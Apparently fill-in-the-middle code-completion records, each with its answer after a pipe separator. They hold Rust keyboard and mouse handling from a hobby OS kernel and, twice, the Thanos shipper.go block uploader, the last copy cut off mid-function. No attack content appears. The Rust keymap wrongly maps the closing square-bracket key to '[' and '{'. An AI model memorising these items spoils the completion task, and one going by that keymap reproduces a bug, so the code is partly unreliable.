log_trace!("key={:?}, release={}", key, release);
match (release, key)
{
// Maintain key states
(false, KeyCode::RightShift) => self.shift_held.set_r(),
(false, KeyCode::LeftShift) => self.shift_held.set_l(),
(false, KeyCode::RightCtrl) => self.ctrl_held.set_r(),
(false, KeyCode::LeftCtrl) => self.ctrl_held.set_l(),
(false, KeyCode::RightAlt) => self.alt_held.set_r(),
(false, KeyCode::LeftAlt) => self.alt_held.set_l(),
(true, KeyCode::RightShift) => self.shift_held.clear_r(),
(true, KeyCode::LeftShift) => self.shift_held.clear_l(),
(true, KeyCode::RightCtrl) => self.ctrl_held.clear_r(),
(true, KeyCode::LeftCtrl) => self.ctrl_held.clear_l(),
(true, KeyCode::RightAlt) => self.alt_held.clear_r(),
(true, KeyCode::LeftAlt) => self.alt_held.clear_l(),
// Check for session change commands, don't propagate if they fired
// - 'try_change_session' checks for the required modifier keys and permissions
// TODO: Should this be handled by the `windows` module?
(false, KeyCode::Esc) => if self.try_change_session(0) { return ; },
(false, KeyCode::F1) => if self.try_change_session(1) { return ; },
(false, KeyCode::F2) => if self.try_change_session(2) { return ; },
(false, KeyCode::F3) => if self.try_change_session(3) { return ; },
(false, KeyCode::F4) => if self.try_change_session(4) { return ; },
(false, KeyCode::F5) => if self.try_change_session(5) { return ; },
(false, KeyCode::F6) => if self.try_change_session(6) { return ; },
(false, KeyCode::F7) => if self.try_change_session(7) { return ; },
(false, KeyCode::F8) => if self.try_change_session(8) { return ; },
(false, KeyCode::F9) => if self.try_change_session(9) { return ; },
(false, KeyCode::F10) => if self.try_change_session(10) { return ; },
(false, KeyCode::F11) => if self.try_change_session(11) { return ; },
(false, KeyCode::F12) => if self.try_change_session(12) { return ; },
_ => {},
}
let last_key = self.last_key_pressed.load(Ordering::Relaxed);
if !release {
self.last_key_pressed.store(key as u8, Ordering::Relaxed);
super::windows::handle_input(/*self, */Event::KeyDown(key));
}
// Handle fire and text events
if key.is_modifier()
{
// Only fire a modifier on key-up IF they were the last one pressed
// - This allows "Gui" (windows) to fire on key-up while still being used as a modifier
if release && last_key == key as u8
{
super::windows::handle_input( Event::KeyFire(key) );
}
}
else
{
// TODO: Support repetition (of the last non-modifier pressed)
if !release
{
super::windows::handle_input( Event::KeyFire(key) );
// TODO: Should only generate text if no non-shift modifiers are depressed
//if self.enable_input_translation {
let s = self.get_input_string(key);
if s.len() > 0 {
let mut buf = [0; 6];
buf[.. s.len()].clone_from_slice( s.as_bytes() );
super::windows::handle_input( Event::Text(buf) );
}
//}
}
}
// Send key combination to active active window (via the window subsystem)
if release {
self.last_key_pressed.store(KeyCode::None as u8, Ordering::Relaxed);
super::windows::handle_input(/*self, */Event::KeyUp(key));
}
}
pub fn handle_mouse_set(&self, norm_x: u16, norm_y: u16)
{
// Mouse movement, update cursor
let (dx,dy) = self.cursor.set_pos(norm_x, norm_y);
let (x,y) = self.cursor.pos();
self.double_click_info.lock().clear();
super::windows::handle_input(/*self, */Event::MouseMove(x, y, dx as i16, dy as i16));
}
pub fn handle_mouse_move(&self, dx: i16, dy: i16)
{
// Mouse movement, update cursor
self.cursor.move_pos(dx as i32, dy as i32);
let (x,y) = self.cursor.pos();
self.double_click_info.lock().clear();
super::windows::handle_input(/*self, */Event::MouseMove(x, y, dx, dy));
}
pub fn handle_mouse_btn(&self, btn: u8, release: bool)
{
let (x,y) = self.cursor.pos();
if release
{
// Released - check the double-click timer
if let Some(ev) = self.double_click_info.lock().check( x,y, btn )
{
super::windows::handle_input(/*self, */ev);
}
super::windows::handle_input(/*self, */Event::MouseUp(x, y, btn));
}
else
{
// Pressed - reset the double-click timer
self.double_click_info.lock().reset(x,y, btn);
super::windows::handle_input(/*self, */Event::MouseDown(x, y, btn));
}
}
fn | (&self) -> bool {
self.shift_held.get()
}
fn upper(&self) -> bool {
self.shift()
}
fn get_input_string(&self, keycode: KeyCode) -> &str
{
macro_rules! shift { ($s:ident: $lower:expr, $upper:expr) => { if $s.shift() { $upper } else {$lower} }; }
macro_rules! alpha { ($s:ident: $lower:expr, $upper:expr) => { if $s.upper() { $upper } else {$lower} }; }
match keycode
{
KeyCode::A => alpha!(self: "a", "A"),
KeyCode::B => alpha!(self: "b", "B"),
KeyCode::C => alpha!(self: "c", "C"),
KeyCode::D => alpha!(self: "d", "D"),
KeyCode::E => alpha!(self: "e", "E"),
KeyCode::F => alpha!(self: "f", "F"),
KeyCode::G => alpha!(self: "g", "G"),
KeyCode::H => alpha!(self: "h", "H"),
KeyCode::I => alpha!(self: "i", "I"),
KeyCode::J => alpha!(self: "j", "J"),
KeyCode::K => alpha!(self: "k", "K"),
KeyCode::L => alpha!(self: "l", "L"),
KeyCode::M => alpha!(self: "m", "M"),
KeyCode::N => alpha!(self: "n", "N"),
KeyCode::O => alpha!(self: "o", "O"),
KeyCode::P => alpha!(self: "p", "P"),
KeyCode::Q => alpha!(self: "q", "Q"),
KeyCode::R => alpha!(self: "r", "R"),
KeyCode::S => alpha!(self: "s", "S"),
KeyCode::T => alpha!(self: "t", "T"),
KeyCode::U => alpha!(self: "u", "U"),
KeyCode::V => alpha!(self: "v", "V"),
KeyCode::W => alpha!(self: "w", "W"),
KeyCode::X => alpha!(self: "x", "X"),
KeyCode::Y => alpha!(self: "y", "Y"),
KeyCode::Z => alpha!(self: "z", "Z"),
KeyCode::SquareOpen => shift!(self: "[", "{"),
KeyCode::SquareClose => shift!(self: "[", "{"),
KeyCode::Backslash => shift!(self: "\\","|"),
KeyCode::Semicolon => shift!(self: ";", ":"),
KeyCode::Quote => shift!(self: "'", "\""),
KeyCode::Comma => shift!(self: ",", "<"),
KeyCode::Period => shift!(self: ".", ">"),
KeyCode::Slash => shift!(self: "/", "?"),
KeyCode::Kb1 => shift!(self: "1", "!"),
KeyCode::Kb2 => shift!(self: "2", "@"),
KeyCode::Kb3 => shift!(self: "3", "#"),
KeyCode::Kb4 => shift!(self: "4", "$"),
KeyCode::Kb5 => shift!(self: "5", "%"),
KeyCode::Kb6 => shift!(self: "6", "^"),
KeyCode::Kb7 => shift!(self: "7", "&"),
KeyCode::Kb8 => shift!(self: "8", "*"),
KeyCode::Kb9 => shift!(self: "9", "("),
KeyCode::Kb0 => shift!(self: "0", ")"),
KeyCode::Minus => shift!(self: "-", "_"),
KeyCode::Equals => shift!(self: "=", "+"),
KeyCode::Space => " ",
_ => "",
}
}
fn try_change_session(&self, target: usize) -> bool {
if self.is_master() && self.ctrl_held.get() && self.alt_held.get() {
super::windows::switch_active(target);
true
}
else {
false
}
}
fn is_master(&self) -> bool { true }
}
impl ModKeyPair {
const fn new() -> ModKeyPair {
ModKeyPair(AtomicUsize::new(0))
}
fn set_l(&self) { self.0.fetch_or(1, Ordering::Relaxed); }
fn set_r(&self) { self.0.fetch_or(2, Ordering::Relaxed); }
fn clear_l(&self) { self.0.fetch_and(!1, Ordering::Relaxed); }
fn clear_r(&self) { self.0.fetch_and(!2, Ordering::Relaxed); }
fn get(&self) -> bool {
self.0.load(Ordering::Relaxed) != 0
}
}
impl MouseCursor {
const fn new() -> MouseCursor {
MouseCursor {
graphics_cursor: ::kernel::sync::Mutex::new(::kernel::metadevs::video::CursorHandle::new()),
}
}
fn add_coord(cur: u32, d: i32) -> u32 {
if d < 0 {
u32::saturating_sub(cur, -d as u32)
}
else {
u32::saturating_add(cur, d as u32)
}
}
/// Set cursor position to normalised coordinates
fn set_pos(&self, norm_x: u16, norm_y: u16) -> (i32, i32) {
let mut lh = self.graphics_cursor.lock();
let pos = lh.get_pos();
let rect = match ::kernel::metadevs::video::get_display_for_pos(pos)
{
Ok(v) => v,
Err(v) => v,
};
let new_pos = ::kernel::metadevs::video::Pos {
x: rect.x() + ((rect.w() as u64 * norm_x as u64) >> 16) as u32,
y: rect.y() + ((rect.h() as u64 * norm_y as u64) >> 16) as u32,
};
lh.set_pos(new_pos);
(
(new_pos.x as i32 - pos.x as i32) as i32,
(new_pos.y as i32 - pos.y as i32) as i32,
)
}
fn move_pos(&self, dx: i32, dy: i32) {
let mut lh = self.graphics_cursor.lock();
let mut pos = lh.get_pos();
pos.x = Self::add_coord(pos.x, dx);
pos.y = Self::add_coord(pos.y, dy);
lh.set_pos(pos);
}
fn pos(&self) -> (u32,u32) {
let pos = self.graphics_cursor.lock().get_pos();
(pos.x, pos.y)
}
}
impl MouseClickInfo
{
const fn new() -> MouseClickInfo {
MouseClickInfo {
button: 0xFF, x: 0, y: 0,
time: 0,
count: 0,
}
}
fn clear(&mut self)
{
self.button = 0xFF;
}
fn reset(&mut self, x: u32, y: u32, button: u8)
{
self.button = button;
self.count = 0;
self.x = x;
self.y = y;
self.time = ::kernel::time::ticks();
}
fn check(&mut self, x: u32, y: u32, button: u8) -> Option<Event>
{
use kernel::lib::num::abs_diff;
if self.button != button {
self.clear();
None
}
else if (::kernel::time::ticks() - self.time) > DOUBLE_CLICK_TIMEOUT {
self.clear();
None
}
else if abs_diff(self.x, x) > MAX_CLICK_MOVE || abs_diff(self.y, y) > MAX_CLICK_MOVE {
self.clear();
None
}
else {
self.time = ::kernel::time::ticks();
self.x = x;
self.y = y;
if self.count < 0xFF {
self.count += 1;
}
Some( Event::MouseClick(x, y, button, self.count) )
}
}
}
| shift | identifier_name |
shipper.go | // Copyright (c) The Thanos Authors.
// Licensed under the Apache License 2.0.
// Package shipper detects directories on the local file system and uploads
// them to a block storage.
package shipper
import (
"context"
"encoding/json"
"math"
"os"
"path"
"path/filepath"
"sort"
"sync"
"github.com/go-kit/log"
"github.com/go-kit/log/level"
"github.com/oklog/ulid"
"github.com/pkg/errors"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/client_golang/prometheus/promauto"
"github.com/prometheus/prometheus/model/labels"
"github.com/prometheus/prometheus/tsdb"
"github.com/prometheus/prometheus/tsdb/fileutil"
"github.com/thanos-io/objstore"
"github.com/thanos-io/thanos/pkg/block"
"github.com/thanos-io/thanos/pkg/block/metadata"
"github.com/thanos-io/thanos/pkg/runutil"
)
type metrics struct {
dirSyncs prometheus.Counter
dirSyncFailures prometheus.Counter
uploads prometheus.Counter
uploadFailures prometheus.Counter
uploadedCompacted prometheus.Gauge
}
func newMetrics(reg prometheus.Registerer) *metrics {
var m metrics
m.dirSyncs = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_dir_syncs_total",
Help: "Total number of dir syncs",
})
m.dirSyncFailures = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_dir_sync_failures_total",
Help: "Total number of failed dir syncs",
})
m.uploads = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_uploads_total",
Help: "Total number of uploaded blocks",
})
m.uploadFailures = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_upload_failures_total",
Help: "Total number of block upload failures",
})
m.uploadedCompacted = promauto.With(reg).NewGauge(prometheus.GaugeOpts{
Name: "thanos_shipper_upload_compacted_done",
Help: "If 1 it means shipper uploaded all compacted blocks from the filesystem.",
})
return &m
}
// Shipper watches a directory for matching files and directories and uploads
// them to a remote data store.
type Shipper struct {
logger log.Logger
dir string
metrics *metrics
bucket objstore.Bucket
source metadata.SourceType
uploadCompactedFunc func() bool
allowOutOfOrderUploads bool
hashFunc metadata.HashFunc
labels func() labels.Labels
mtx sync.RWMutex
}
// New creates a new shipper that detects new TSDB blocks in dir and uploads them to
// remote if necessary. It attaches the Thanos metadata section in each meta JSON file.
// If uploadCompacted is enabled, it also uploads compacted blocks which are already in filesystem.
func New(
logger log.Logger,
r prometheus.Registerer,
dir string,
bucket objstore.Bucket,
lbls func() labels.Labels,
source metadata.SourceType,
uploadCompactedFunc func() bool,
allowOutOfOrderUploads bool,
hashFunc metadata.HashFunc,
) *Shipper {
if logger == nil {
logger = log.NewNopLogger()
}
if lbls == nil {
lbls = func() labels.Labels { return nil }
}
if uploadCompactedFunc == nil {
uploadCompactedFunc = func() bool {
return false
}
}
return &Shipper{
logger: logger,
dir: dir,
bucket: bucket,
labels: lbls,
metrics: newMetrics(r),
source: source,
allowOutOfOrderUploads: allowOutOfOrderUploads,
uploadCompactedFunc: uploadCompactedFunc,
hashFunc: hashFunc,
}
}
func (s *Shipper) SetLabels(lbls labels.Labels) {
s.mtx.Lock()
defer s.mtx.Unlock()
s.labels = func() labels.Labels { return lbls }
}
func (s *Shipper) getLabels() labels.Labels {
s.mtx.RLock()
defer s.mtx.RUnlock()
return s.labels()
}
// Timestamps returns the minimum timestamp for which data is available and the highest timestamp
// of blocks that were successfully uploaded.
func (s *Shipper) Timestamps() (minTime, maxSyncTime int64, err error) {
meta, err := ReadMetaFile(s.dir)
if err != nil {
return 0, 0, errors.Wrap(err, "read shipper meta file")
}
// Build a map of blocks we already uploaded.
hasUploaded := make(map[ulid.ULID]struct{}, len(meta.Uploaded))
for _, id := range meta.Uploaded {
hasUploaded[id] = struct{}{}
}
minTime = math.MaxInt64
maxSyncTime = math.MinInt64
metas, err := s.blockMetasFromOldest()
if err != nil {
return 0, 0, err
}
for _, m := range metas {
if m.MinTime < minTime {
minTime = m.MinTime
}
if _, ok := hasUploaded[m.ULID]; ok && m.MaxTime > maxSyncTime {
maxSyncTime = m.MaxTime
}
}
if minTime == math.MaxInt64 {
// No block yet found. We cannot assume any min block size so propagate 0 minTime.
minTime = 0
}
return minTime, maxSyncTime, nil
}
type lazyOverlapChecker struct {
synced bool
logger log.Logger
bucket objstore.Bucket
labels func() labels.Labels
metas []tsdb.BlockMeta
lookupMetas map[ulid.ULID]struct{}
}
func newLazyOverlapChecker(logger log.Logger, bucket objstore.Bucket, labels func() labels.Labels) *lazyOverlapChecker {
return &lazyOverlapChecker{
logger: logger,
bucket: bucket,
labels: labels,
lookupMetas: map[ulid.ULID]struct{}{},
}
}
func (c *lazyOverlapChecker) sync(ctx context.Context) error {
if err := c.bucket.Iter(ctx, "", func(path string) error {
id, ok := block.IsBlockDir(path)
if !ok {
return nil
}
m, err := block.DownloadMeta(ctx, c.logger, c.bucket, id)
if err != nil {
return err
}
if !labels.Equal(labels.FromMap(m.Thanos.Labels), c.labels()) {
return nil
}
c.metas = append(c.metas, m.BlockMeta)
c.lookupMetas[m.ULID] = struct{}{}
return nil
}); err != nil {
return errors.Wrap(err, "get all block meta.")
}
c.synced = true
return nil
}
func (c *lazyOverlapChecker) IsOverlapping(ctx context.Context, newMeta tsdb.BlockMeta) error {
if !c.synced {
level.Info(c.logger).Log("msg", "gathering all existing blocks from the remote bucket for check", "id", newMeta.ULID.String())
if err := c.sync(ctx); err != nil {
return err
}
}
// TODO(bwplotka) so confusing! we need to sort it first. Add comment to TSDB code.
metas := append([]tsdb.BlockMeta{newMeta}, c.metas...)
sort.Slice(metas, func(i, j int) bool {
return metas[i].MinTime < metas[j].MinTime
})
if o := tsdb.OverlappingBlocks(metas); len(o) > 0 {
// TODO(bwplotka): Consider checking if overlaps relates to block in concern?
return errors.Errorf("shipping compacted block %s is blocked; overlap spotted: %s", newMeta.ULID, o.String())
}
return nil
}
// Sync performs a single synchronization, which ensures all non-compacted local blocks have been uploaded
// to the object bucket once.
//
// If uploaded.
//
// It is not concurrency-safe, however it is compactor-safe (running concurrently with compactor is ok).
func (s *Shipper) | (ctx context.Context) (uploaded int, err error) {
meta, err := ReadMetaFile(s.dir)
if err != nil {
// If we encounter any error, proceed with an empty meta file and overwrite it later.
// The meta file is only used to avoid unnecessary bucket.Exists call,
// which are properly handled by the system if their occur anyway.
if !os.IsNotExist(err) {
level.Warn(s.logger).Log("msg", "reading meta file failed, will override it", "err", err)
}
meta = &Meta{Version: MetaVersion1}
}
// Build a map of blocks we already uploaded.
hasUploaded := make(map[ulid.ULID]struct{}, len(meta.Uploaded))
for _, id := range meta.Uploaded {
hasUploaded[id] = struct{}{}
}
// Reset the uploaded slice so we can rebuild it only with blocks that still exist locally.
meta.Uploaded = nil
var (
checker = newLazyOverlapChecker(s.logger, s.bucket, s.getLabels)
uploadErrs int
)
uploadCompacted := s.uploadCompactedFunc()
metas, err := s.blockMetasFromOldest()
if err != nil {
return 0, err
}
for _, m := range metas {
// Do not sync a block if we already uploaded or ignored it. If it's no longer found in the bucket,
// it was generally removed by the compaction process.
if _, uploaded := hasUploaded[m.ULID]; uploaded {
meta.Uploaded = append(meta.Uploaded, m.ULID)
continue
}
if m.Stats.NumSamples == 0 {
// Ignore empty blocks.
level.Debug(s.logger).Log("msg", "ignoring empty block", "block", m.ULID)
continue
}
// We only ship of the first compacted block level as normal flow.
if m.Compaction.Level > 1 {
if !uploadCompacted {
continue
}
}
// Check against bucket if the meta file for this block exists.
ok, err := s.bucket.Exists(ctx, path.Join(m.ULID.String(), block.MetaFilename))
if err != nil {
return 0, errors.Wrap(err, "check exists")
}
if ok {
meta.Uploaded = append(meta.Uploaded, m.ULID)
continue
}
// Skip overlap check if out of order uploads is enabled.
if m.Compaction.Level > 1 && !s.allowOutOfOrderUploads {
if err := checker.IsOverlapping(ctx, m.BlockMeta); err != nil {
return 0, errors.Errorf("Found overlap or error during sync, cannot upload compacted block, details: %v", err)
}
}
if err := s.upload(ctx, m); err != nil {
if !s.allowOutOfOrderUploads {
return 0, errors.Wrapf(err, "upload %v", m.ULID)
}
// No error returned, just log line. This is because we want other blocks to be uploaded even
// though this one failed. It will be retried on second Sync iteration.
level.Error(s.logger).Log("msg", "shipping failed", "block", m.ULID, "err", err)
uploadErrs++
continue
}
meta.Uploaded = append(meta.Uploaded, m.ULID)
uploaded++
s.metrics.uploads.Inc()
}
if err := WriteMetaFile(s.logger, s.dir, meta); err != nil {
level.Warn(s.logger).Log("msg", "updating meta file failed", "err", err)
}
s.metrics.dirSyncs.Inc()
if uploadErrs > 0 {
s.metrics.uploadFailures.Add(float64(uploadErrs))
return uploaded, errors.Errorf("failed to sync %v blocks", uploadErrs)
}
if uploadCompacted {
s.metrics.uploadedCompacted.Set(1)
} else {
s.metrics.uploadedCompacted.Set(0)
}
return uploaded, nil
}
// sync uploads the block if not exists in remote storage.
// TODO(khyatisoneji): Double check if block does not have deletion-mark.json for some reason, otherwise log it or return error.
func (s *Shipper) upload(ctx context.Context, meta *metadata.Meta) error {
level.Info(s.logger).Log("msg", "upload new block", "id", meta.ULID)
// We hard-link the files into a temporary upload directory so we are not affected
// by other operations happening against the TSDB directory.
updir := filepath.Join(s.dir, "thanos", "upload", meta.ULID.String())
// Remove updir just in case.
if err := os.RemoveAll(updir); err != nil {
return errors.Wrap(err, "clean upload directory")
}
if err := os.MkdirAll(updir, 0750); err != nil {
return errors.Wrap(err, "create upload dir")
}
defer func() {
if err := os.RemoveAll(updir); err != nil {
level.Error(s.logger).Log("msg", "failed to clean upload directory", "err", err)
}
}()
dir := filepath.Join(s.dir, meta.ULID.String())
if err := hardlinkBlock(dir, updir); err != nil {
return errors.Wrap(err, "hard link block")
}
// Attach current labels and write a new meta file with Thanos extensions.
if lset := s.getLabels(); lset != nil {
meta.Thanos.Labels = lset.Map()
}
meta.Thanos.Source = s.source
meta.Thanos.SegmentFiles = block.GetSegmentFiles(updir)
if err := meta.WriteToDir(s.logger, updir); err != nil {
return errors.Wrap(err, "write meta file")
}
return block.Upload(ctx, s.logger, s.bucket, updir, s.hashFunc)
}
// blockMetasFromOldest returns the block meta of each block found in dir
// sorted by minTime asc.
func (s *Shipper) blockMetasFromOldest() (metas []*metadata.Meta, _ error) {
fis, err := os.ReadDir(s.dir)
if err != nil {
return nil, errors.Wrap(err, "read dir")
}
names := make([]string, 0, len(fis))
for _, fi := range fis {
names = append(names, fi.Name())
}
for _, n := range names {
if _, ok := block.IsBlockDir(n); !ok {
continue
}
dir := filepath.Join(s.dir, n)
fi, err := os.Stat(dir)
if err != nil {
return nil, errors.Wrapf(err, "stat block %v", dir)
}
if !fi.IsDir() {
continue
}
m, err := metadata.ReadFromDir(dir)
if err != nil {
return nil, errors.Wrapf(err, "read metadata for block %v", dir)
}
metas = append(metas, m)
}
sort.Slice(metas, func(i, j int) bool {
return metas[i].BlockMeta.MinTime < metas[j].BlockMeta.MinTime
})
return metas, nil
}
func hardlinkBlock(src, dst string) error {
chunkDir := filepath.Join(dst, block.ChunksDirname)
if err := os.MkdirAll(chunkDir, 0750); err != nil {
return errors.Wrap(err, "create chunks dir")
}
fis, err := os.ReadDir(filepath.Join(src, block.ChunksDirname))
if err != nil {
return errors.Wrap(err, "read chunk dir")
}
files := make([]string, 0, len(fis))
for _, fi := range fis {
files = append(files, fi.Name())
}
for i, fn := range files {
files[i] = filepath.Join(block.ChunksDirname, fn)
}
files = append(files, block.MetaFilename, block.IndexFilename)
for _, fn := range files {
if err := os.Link(filepath.Join(src, fn), filepath.Join(dst, fn)); err != nil {
return errors.Wrapf(err, "hard link file %s", fn)
}
}
return nil
}
// Meta defines the format thanos.shipper.json file that the shipper places in the data directory.
type Meta struct {
Version int `json:"version"`
Uploaded []ulid.ULID `json:"uploaded"`
}
const (
// MetaFilename is the known JSON filename for meta information.
MetaFilename = "thanos.shipper.json"
// MetaVersion1 represents 1 version of meta.
MetaVersion1 = 1
)
// WriteMetaFile writes the given meta into <dir>/thanos.shipper.json.
func WriteMetaFile(logger log.Logger, dir string, meta *Meta) error {
// Make any changes to the file appear atomic.
path := filepath.Join(dir, MetaFilename)
tmp := path + ".tmp"
f, err := os.Create(tmp)
if err != nil {
return err
}
enc := json.NewEncoder(f)
enc.SetIndent("", "\t")
if err := enc.Encode(meta); err != nil {
runutil.CloseWithLogOnErr(logger, f, "write meta file close")
return err
}
if err := f.Close(); err != nil {
return err
}
return renameFile(logger, tmp, path)
}
// ReadMetaFile reads the given meta from <dir>/thanos.shipper.json.
func ReadMetaFile(dir string) (*Meta, error) {
fpath := filepath.Join(dir, filepath.Clean(MetaFilename))
b, err := os.ReadFile(fpath)
if err != nil {
return nil, errors.Wrapf(err, "failed to read %s", fpath)
}
var m Meta
if err := json.Unmarshal(b, &m); err != nil {
return nil, errors.Wrapf(err, "failed to parse %s as JSON: %q", fpath, string(b))
}
if m.Version != MetaVersion1 {
return nil, errors.Errorf("unexpected meta file version %d", m.Version)
}
return &m, nil
}
func renameFile(logger log.Logger, from, to string) error {
if err := os.RemoveAll(to); err != nil {
return err
}
if err := os.Rename(from, to); err != nil {
return err
}
// Directory was renamed; sync parent dir to persist rename.
pdir, err := fileutil.OpenDir(filepath.Dir(to))
if err != nil {
return err
}
if err = fileutil.Fdatasync(pdir); err != nil {
runutil.CloseWithLogOnErr(logger, pdir, "rename file dir close")
return err
}
return pdir.Close()
}
| Sync | identifier_name |
shipper.go | // Copyright (c) The Thanos Authors.
// Licensed under the Apache License 2.0.
// Package shipper detects directories on the local file system and uploads
// them to a block storage.
package shipper
import (
"context"
"encoding/json"
"math"
"os"
"path"
"path/filepath"
"sort"
"sync"
"github.com/go-kit/log"
"github.com/go-kit/log/level"
"github.com/oklog/ulid"
"github.com/pkg/errors"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/client_golang/prometheus/promauto"
"github.com/prometheus/prometheus/model/labels"
"github.com/prometheus/prometheus/tsdb"
"github.com/prometheus/prometheus/tsdb/fileutil"
"github.com/thanos-io/objstore"
"github.com/thanos-io/thanos/pkg/block"
"github.com/thanos-io/thanos/pkg/block/metadata"
"github.com/thanos-io/thanos/pkg/runutil"
)
type metrics struct {
dirSyncs prometheus.Counter
dirSyncFailures prometheus.Counter
uploads prometheus.Counter
uploadFailures prometheus.Counter
uploadedCompacted prometheus.Gauge
}
func newMetrics(reg prometheus.Registerer) *metrics {
var m metrics
m.dirSyncs = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_dir_syncs_total",
Help: "Total number of dir syncs",
})
m.dirSyncFailures = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_dir_sync_failures_total",
Help: "Total number of failed dir syncs",
})
m.uploads = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_uploads_total",
Help: "Total number of uploaded blocks",
})
m.uploadFailures = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_upload_failures_total",
Help: "Total number of block upload failures",
})
m.uploadedCompacted = promauto.With(reg).NewGauge(prometheus.GaugeOpts{
Name: "thanos_shipper_upload_compacted_done",
Help: "If 1 it means shipper uploaded all compacted blocks from the filesystem.",
})
return &m
}
// Shipper watches a directory for matching files and directories and uploads
// them to a remote data store.
type Shipper struct {
logger log.Logger
dir string
metrics *metrics
bucket objstore.Bucket
source metadata.SourceType
uploadCompactedFunc func() bool
allowOutOfOrderUploads bool
hashFunc metadata.HashFunc
labels func() labels.Labels
mtx sync.RWMutex
}
// New creates a new shipper that detects new TSDB blocks in dir and uploads them to
// remote if necessary. It attaches the Thanos metadata section in each meta JSON file.
// If uploadCompacted is enabled, it also uploads compacted blocks which are already in filesystem.
func New(
logger log.Logger,
r prometheus.Registerer,
dir string,
bucket objstore.Bucket,
lbls func() labels.Labels,
source metadata.SourceType,
uploadCompactedFunc func() bool,
allowOutOfOrderUploads bool,
hashFunc metadata.HashFunc,
) *Shipper {
if logger == nil {
logger = log.NewNopLogger()
}
if lbls == nil {
lbls = func() labels.Labels { return nil }
}
if uploadCompactedFunc == nil {
uploadCompactedFunc = func() bool {
return false
}
}
return &Shipper{
logger: logger,
dir: dir,
bucket: bucket,
labels: lbls,
metrics: newMetrics(r),
source: source,
allowOutOfOrderUploads: allowOutOfOrderUploads,
uploadCompactedFunc: uploadCompactedFunc,
hashFunc: hashFunc,
}
}
func (s *Shipper) SetLabels(lbls labels.Labels) {
s.mtx.Lock()
defer s.mtx.Unlock()
s.labels = func() labels.Labels { return lbls }
}
func (s *Shipper) getLabels() labels.Labels {
s.mtx.RLock()
defer s.mtx.RUnlock()
return s.labels()
}
// Timestamps returns the minimum timestamp for which data is available and the highest timestamp
// of blocks that were successfully uploaded.
func (s *Shipper) Timestamps() (minTime, maxSyncTime int64, err error) {
meta, err := ReadMetaFile(s.dir)
if err != nil {
return 0, 0, errors.Wrap(err, "read shipper meta file")
}
// Build a map of blocks we already uploaded.
hasUploaded := make(map[ulid.ULID]struct{}, len(meta.Uploaded))
for _, id := range meta.Uploaded {
hasUploaded[id] = struct{}{}
}
minTime = math.MaxInt64
maxSyncTime = math.MinInt64
metas, err := s.blockMetasFromOldest()
if err != nil {
return 0, 0, err
}
for _, m := range metas {
if m.MinTime < minTime {
minTime = m.MinTime
}
if _, ok := hasUploaded[m.ULID]; ok && m.MaxTime > maxSyncTime {
maxSyncTime = m.MaxTime
}
}
if minTime == math.MaxInt64 {
// No block yet found. We cannot assume any min block size so propagate 0 minTime.
minTime = 0
}
return minTime, maxSyncTime, nil
}
type lazyOverlapChecker struct {
synced bool
logger log.Logger
bucket objstore.Bucket
labels func() labels.Labels
metas []tsdb.BlockMeta
lookupMetas map[ulid.ULID]struct{}
}
func newLazyOverlapChecker(logger log.Logger, bucket objstore.Bucket, labels func() labels.Labels) *lazyOverlapChecker {
return &lazyOverlapChecker{
logger: logger,
bucket: bucket,
labels: labels,
lookupMetas: map[ulid.ULID]struct{}{},
}
}
func (c *lazyOverlapChecker) sync(ctx context.Context) error {
if err := c.bucket.Iter(ctx, "", func(path string) error {
id, ok := block.IsBlockDir(path)
if !ok {
return nil
}
m, err := block.DownloadMeta(ctx, c.logger, c.bucket, id)
if err != nil {
return err
}
if !labels.Equal(labels.FromMap(m.Thanos.Labels), c.labels()) {
return nil
}
c.metas = append(c.metas, m.BlockMeta)
c.lookupMetas[m.ULID] = struct{}{}
return nil
}); err != nil {
return errors.Wrap(err, "get all block meta.")
}
c.synced = true
return nil
}
func (c *lazyOverlapChecker) IsOverlapping(ctx context.Context, newMeta tsdb.BlockMeta) error {
if !c.synced {
level.Info(c.logger).Log("msg", "gathering all existing blocks from the remote bucket for check", "id", newMeta.ULID.String())
if err := c.sync(ctx); err != nil {
return err
}
}
// TODO(bwplotka) so confusing! we need to sort it first. Add comment to TSDB code.
metas := append([]tsdb.BlockMeta{newMeta}, c.metas...)
sort.Slice(metas, func(i, j int) bool {
return metas[i].MinTime < metas[j].MinTime
})
if o := tsdb.OverlappingBlocks(metas); len(o) > 0 {
// TODO(bwplotka): Consider checking if overlaps relates to block in concern?
return errors.Errorf("shipping compacted block %s is blocked; overlap spotted: %s", newMeta.ULID, o.String())
}
return nil
}
// Sync performs a single synchronization, which ensures all non-compacted local blocks have been uploaded
// to the object bucket once.
//
// If uploaded.
//
// It is not concurrency-safe, however it is compactor-safe (running concurrently with compactor is ok).
func (s *Shipper) Sync(ctx context.Context) (uploaded int, err error) {
meta, err := ReadMetaFile(s.dir)
if err != nil {
// If we encounter any error, proceed with an empty meta file and overwrite it later.
// The meta file is only used to avoid unnecessary bucket.Exists call,
// which are properly handled by the system if their occur anyway.
if !os.IsNotExist(err) {
level.Warn(s.logger).Log("msg", "reading meta file failed, will override it", "err", err)
}
meta = &Meta{Version: MetaVersion1}
}
// Build a map of blocks we already uploaded.
hasUploaded := make(map[ulid.ULID]struct{}, len(meta.Uploaded))
for _, id := range meta.Uploaded {
hasUploaded[id] = struct{}{}
}
// Reset the uploaded slice so we can rebuild it only with blocks that still exist locally.
meta.Uploaded = nil
var (
checker = newLazyOverlapChecker(s.logger, s.bucket, s.getLabels)
uploadErrs int
)
uploadCompacted := s.uploadCompactedFunc()
metas, err := s.blockMetasFromOldest()
if err != nil {
return 0, err
}
for _, m := range metas {
// Do not sync a block if we already uploaded or ignored it. If it's no longer found in the bucket,
// it was generally removed by the compaction process.
if _, uploaded := hasUploaded[m.ULID]; uploaded {
meta.Uploaded = append(meta.Uploaded, m.ULID)
continue
}
if m.Stats.NumSamples == 0 {
// Ignore empty blocks.
level.Debug(s.logger).Log("msg", "ignoring empty block", "block", m.ULID)
